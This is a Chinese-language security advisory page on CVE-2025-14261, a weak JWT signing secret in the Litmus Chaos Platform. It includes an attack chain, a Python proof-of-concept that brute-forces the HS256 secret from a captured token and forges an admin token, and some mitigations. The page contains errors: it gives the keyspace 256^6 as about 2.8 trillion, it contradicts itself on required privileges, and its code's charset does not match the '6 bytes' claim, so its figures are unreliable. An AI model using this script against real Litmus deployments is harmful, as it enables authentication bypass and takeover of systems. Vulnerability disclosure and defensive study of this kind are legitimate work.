CVE-2025-14261 CVSS 7.1 高危

CVE-2025-14261: Litmus平台JWT密钥熵不足导致认证绕过漏洞

披露日期: 2025-12-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-14261

漏洞类型

弱密钥/熵不足

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Litmus Chaos Platform

漏洞概述

CVE-2025-14261是Litmus混沌工程平台中的一个高危安全漏洞。该平台使用JWT（JSON Web Token）进行身份认证和授权，但用于签名JWT的密钥核心长度仅为6字节，这使得密钥极易被破解。攻击者可以通过暴力破解或彩虹表攻击获取JWT签名密钥，然后伪造有效的JWT令牌，从而绕过正常的身份认证流程，以任意用户权限访问系统资源。该漏洞无需特殊权限要求，攻击复杂度低，且可对系统可用性造成严重影响。CVSS评分7.1，属于高危漏洞。

技术细节

Litmus平台在JWT令牌生成过程中使用了_entropy严重不足的密钥。具体而言，用于HS256算法签名JWT的密钥仅包含6个字节的熵，这意味着密钥空间极小（256^6 = 约2.8万亿种可能）。攻击者可以：1）通过拦截获取合法用户的JWT令牌；2）使用GPU加速或分布式计算进行高速暴力破解；3）在极短时间内（通常数分钟内）还原出签名密钥；4）使用该密钥伪造任意用户身份的JWT令牌。由于JWT中包含用户权限信息，伪造的令牌可赋予攻击者管理员权限，从而完全控制Litmus平台，执行未授权的混沌实验、窃取敏感数据或破坏系统稳定性。

攻击链分析

STEP 1

步骤1

攻击者通过中间人攻击或日志获取目标用户的JWT令牌

STEP 2

步骤2

使用GPU加速或分布式计算对JWT签名密钥进行暴力破解（密钥空间仅256^6）

STEP 3

步骤3

成功破解后，使用获取的密钥伪造具有管理员权限的恶意JWT令牌

STEP 4

步骤4

使用伪造的令牌向Litmus API发送请求，绕过认证机制获取系统控制权

STEP 5

步骤5

执行未授权的混沌实验、窃取敏感数据或破坏系统可用性

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import jwt
import itertools
import string
from datetime import datetime, timedelta

# JWT token captured from the target
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."

# Character set for brute force (6 bytes = alphanumeric)
charset = string.ascii_letters + string.digits

def crack_jwt_secret(token, max_length=6):
    """
    Brute force attack to crack weak JWT secret
    This PoC demonstrates the vulnerability due to insufficient entropy
    """
    for length in range(1, max_length + 1):
        for attempt in itertools.product(charset, repeat=length):
            secret = ''.join(attempt)
            try:
                decoded = jwt.decode(token, secret, algorithms=['HS256'])
                print(f"[+] Secret found: {secret}")
                print(f"[+] Decoded payload: {decoded}")
                return secret
            except jwt.InvalidSignatureError:
                continue
    return None

# Generate malicious token after cracking
def forge_token(secret, user_id="admin", role="admin"):
    """
    Forge a malicious JWT token using the cracked secret
    """
    payload = {
        "sub": user_id,
        "role": role,
        "exp": datetime.utcnow() + timedelta(hours=24),
        "iat": datetime.utcnow()
    }
    forged_token = jwt.encode(payload, secret, algorithm='HS256')
    return forged_token

# Usage example
secret = crack_jwt_secret(token)
if secret:
    malicious_token = forge_token(secret, user_id="admin", role="admin")
    print(f"Malicious token: {malicious_token}")

影响范围

Litmus Chaos Platform < 3.15.0

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施临时缓解：1）限制JWT令牌的传输渠道，使用HTTPS强制加密；2）设置JWT令牌短期过期时间（如15分钟）；3）增加IP白名单和User-Agent验证；4）启用额外的应用层认证机制；5）监控认证日志以检测暴力破解行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表